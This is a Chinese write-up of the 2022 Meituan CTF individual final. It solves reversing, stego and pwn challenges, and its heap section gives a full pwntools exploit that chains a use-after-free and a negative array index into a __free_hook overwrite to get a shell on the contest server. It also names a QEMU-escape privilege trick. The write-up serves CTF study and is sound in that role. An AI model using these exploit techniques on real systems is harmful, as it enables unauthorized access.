2022美团CTF个人决赛WP

Reverse

ROP

解析data的ROP，一点一点还原

1. from pwn import *
2. opcode = open('data', 'rb').read()
3. opcode_gadget = opcode[0x30+8:]
4. for offset in range(0, len(opcode_gadget), 8):
5.     print(f'{hex(u64(opcode_gadget[offset:offset+8]))}')

复制代码

 
提取出来密文，转成64位的

1. cipher = [0x98, 0x7A, 0xDF, 0x57, 0xC6, 0xE3, 0x18, 0xC7, 0x11, 0x07, 0xC7, 0xD4, 0x02, 0xD2, 0x9E,
2.           0x43, 0x3A, 0xCE, 0x32, 0x04, 0x33, 0x2D, 0x30, 0x30, 0xAB, 0x03, 0x84, 0xB2, 0xA9, 0x09, 0xAA, 0x40]
3. cipher=[int.from_bytes(bytes(cipher[i:i+8]), 'little')  for i in range(0,32,8)]

复制代码

分析gadget都是通过设置rax和参数寄存器，然后call rax触发函数，函数只有4种

流程是一开始将一个32位字符放到bss段中，这个bss贴近我们输入放入bss段的位置，参与到运算然后开始rop链，读取42个字符，提取uuid中32位字符，进行加密运算，运算的最后一部分是swap的操作，测试得知顺序改变为[2,3,0,1]
最后对比密文跳转结果
照着指令写一个逆回来的过程

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <stdint.h>
4. uint64_t bss_flag[] = {3472325009839672890, 4659547388917318571, 14346467054006008472, 4872562756463036177, 3545518422457791288, 3689401600665085541, 3906648618554712880, 7004559110426617186};
5. void add(int i,int j){
6.     bss_flag[i] -= bss_flag[j];
7. }
8. ​
9. void sub(int i,int j){
10.     bss_flag[i] += bss_flag[j];
11. }
12. ​
13. void xor1(int i,int j){
14.     bss_flag[i] ^= bss_flag[j];
15. }
16. ​
17. int main(){
18.     sub(0x0,0x7);
19.     add(0x1,0x5);
20.     sub(0x3,0x7);
21.     add(0x0,0x5);
22.     add(0x0,0x7);
23.     sub(0x3,0x7);
24.     add(0x0,0x5);
25.     xor1(0x2,0x5);
26.     xor1(0x2,0x5);
27.     sub(0x3,0x7);
28.     sub(0x2,0x6);
29.     xor1(0x0,0x7);
30.     add(0x2,0x4);
31.     add(0x1,0x4);
32.     xor1(0x1,0x7);
33.     xor1(0x0,0x7);
34.     sub(0x0,0x5);
35.     sub(0x0,0x7);
36.     sub(0x0,0x5);
37.     add(0x1,0x7);
38.     xor1(0x1,0x5);
39.     add(0x1,0x6);
40.     sub(0x1,0x4);
41.     xor1(0x2,0x4);
42.     add(0x1,0x4);
43.     sub(0x0,0x6);
44.     sub(0x2,0x7);
45.     add(0x1,0x6);
46.     sub(0x2,0x5);
47.     add(0x0,0x7);
48.     xor1(0x3,0x6);
49.     add(0x2,0x4);
50.     xor1(0x0,0x6);
51.     xor1(0x0,0x5);
52.     xor1(0x3,0x7);
53.     xor1(0x0,0x4);
54.     xor1(0x2,0x5);
55.     xor1(0x2,0x6);
56.     xor1(0x2,0x6);
57.     xor1(0x3,0x4);
58.     xor1(0x0,0x7);
59.     xor1(0x2,0x5);
60.     xor1(0x0,0x4);
61.     xor1(0x3,0x5);
62.     xor1(0x1,0x6);
63.     xor1(0x3,0x7);
64.     xor1(0x0,0x4);
65.     xor1(0x1,0x4);
66.     xor1(0x2,0x7);
67.     xor1(0x1,0x7);
68.     xor1(0x0,0x4);
69.     xor1(0x2,0x6);
70.     xor1(0x0,0x5);
71.     xor1(0x1,0x7);
72.     xor1(0x0,0x5);
73.     xor1(0x0,0x4);
74.     xor1(0x3,0x6);
75.     xor1(0x1,0x7);
76.     xor1(0x2,0x5);
77.     xor1(0x0,0x7);
78.     xor1(0x0,0x7);
79.     xor1(0x2,0x4);
80.     xor1(0x3,0x4);
81.     xor1(0x3,0x7);
82.     printf("%s",(char *)bss_flag);
83.     // flag{eb4781b3-e3c5-475e-8af4-2fa50468f485}
84. }

复制代码

【----帮助网安学习，以下所有学习资料免费领！加vx：yj009991，备注 “博客园” 获取！】
　① 网安学习成长路径思维导图
　② 60+网安经典常用工具包
　③ 100+SRC漏洞分析报告
　④ 150+网安攻防实战技术电子书
　⑤ 最权威CISSP 认证考试指南+题库
　⑥ 超1800页CTF实战技巧手册
　⑦ 最新网安大厂面试题合集（含答案）
　⑧ APP客户端安全检测指南（安卓+IOS）
crackme

go语言，一开始我ida还f5反编译不了，换了个才可以，难顶
直接sm4加密和rc4，sm4密钥写死在代码里
[img=720,128.48748639825897]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202210111406477.png[/img]
rc4的key在linese.txt里，密文也在里面
exp:

1. from binascii import unhexlify
2. from Crypto.Cipher import ARC4
3. from sm4 import SM4Key
4. ​
5. c= unhexlify(b'cc53de43058c79e4e13dbfe4e1ece82ec7d70b0fe460d50a6e2dfbbdac0b22173124ac7dee560b026b9b4cf1394c9493ad62874b4ef2125bbe27f99827d2a801b1b994c90bc31caea1cc9dc09362b518')
6. key = b'd0cac74c1bbeea071817360e491585e8'
7. cipher = ARC4.new(key)
8. m = cipher.decrypt(c)
9. key0 = SM4Key(b'xc08asb890ajds0a')
10. print(key0.decrypt(m))

复制代码

Misc

What is that

stegsolve直接切换几个通道就可以看到
[img=720,823.3893919793014]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202210111406478.png[/img]
pwn

hello

直接网上查到kernel pwn qemu 的非预期
ctrl+a然后c进入shell，cat flag没有权限，要再提权，删除/sbin/poweroff然后exit就可以到su权限，再cat flag就可以
[img=720,509.4104046242775]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202210111406479.png[/img]
heap

一个UAF+数组上溢出
这里可以输入负数，可以数组溢出就可以往上泄露地址，泄露出程序基地址后再相同手法修改free_hook就可以。

1. from pwn import *
2. context.log_level='debug'
3. #p=process('./pwn')
4. p=remote('47.95.8.59',42283)
5. elf=ELF('./pwn')
6. #libc=ELF('/usr/lib/freelibs/amd64/2.27-3ubuntu1.5_amd64/libc.so.6')
7. libc=ELF('./libc.so.6')
8. ​
9. def add(size):
10.     p.sendafter(b'>\n', b'1')
11.     p.sendafter(b'add?\n', str(size).encode())
12. ​
13. def dele(index):
14.     p.sendafter(b'>\n', b'2')
15.     p.sendafter(b'up?\n', str(index).encode())
16. ​
17. def edit(index,size,content):
18.     p.sendafter(b'>\n', b'3')
19.     p.sendafter(b'write?\n', str(index).encode())
20.     p.sendafter(b'write?\n', str(size).encode())
21.     p.sendafter(b'Content:', content)
22. ​
23. def show(index):
24.     p.sendafter(b'>\n', b'4')
25.     p.sendafter(b'review?\n', str(index).encode())
26. ​
27. show(-11)
28. p.recvuntil('Content:')
29. probase=u64(p.recv(6).ljust(8,b'\x00'))-0x4008
30. arraddr=probase+0x4060
31. add(0x10)
32. add(0x10)
33. add(0x10)
34. dele(0)
35. dele(1)
36. dele(2)
37. edit(1,8,p64(arraddr))
38. add(0x10)
39. add(0x10)
40. add(0x10)
41. edit(2,8,p64(probase+elf.got['puts']))
42. show(0)
43. libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.symbols['puts']
44. free_hook=libc_base+libc.symbols['__free_hook']
45. system=libc_base+libc.symbols['system']
46. edit(2,8,p64(free_hook))
47. edit(0,8,p64(system))
48. add(0x10)
49. edit(3,8,b'/bin/sh\x00')
50. dele(3)
51. p.interactive()

复制代码

1.  <strong><strong><strong>更多靶场实验练习、网安学习资料，<a target="_blank" href="https://www.hetianlab.com/" rel="noopener">请点击这里>></a></strong></strong></strong><br><br>

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！